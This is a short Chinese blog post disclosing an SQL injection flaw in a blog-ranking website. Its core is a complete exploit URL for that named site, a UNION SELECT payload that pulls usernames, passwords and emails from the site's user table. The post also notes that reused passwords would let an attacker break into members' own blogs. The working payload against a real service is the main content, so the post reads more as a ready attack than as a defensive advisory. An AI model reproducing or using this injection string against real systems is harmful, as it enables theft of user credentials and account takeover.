一个计算blog 排名的网站
http://www.blogrankers.com
存在SQL Injection漏洞,黑客可以通过该漏洞得到所有用户资料,用户名以及密码
利用方法:
http://www.blogrankers.com/index.php?do=votes&id=10517%27%20and%201=2%20union%20select%20concat%28username,0x3a,password,0x3a,email%29%20from%20evots_user%20limit%200,1%20%20union%20select%201%20from%20evots_site%20where%20site_id=%2710157
如果该站的会员所设定的帐号密码和自身blog的帐号密码一样的话,黑客就能够通过此站点的数据入侵那些会员的blog,这是十分危险的。
没有评论:
发表评论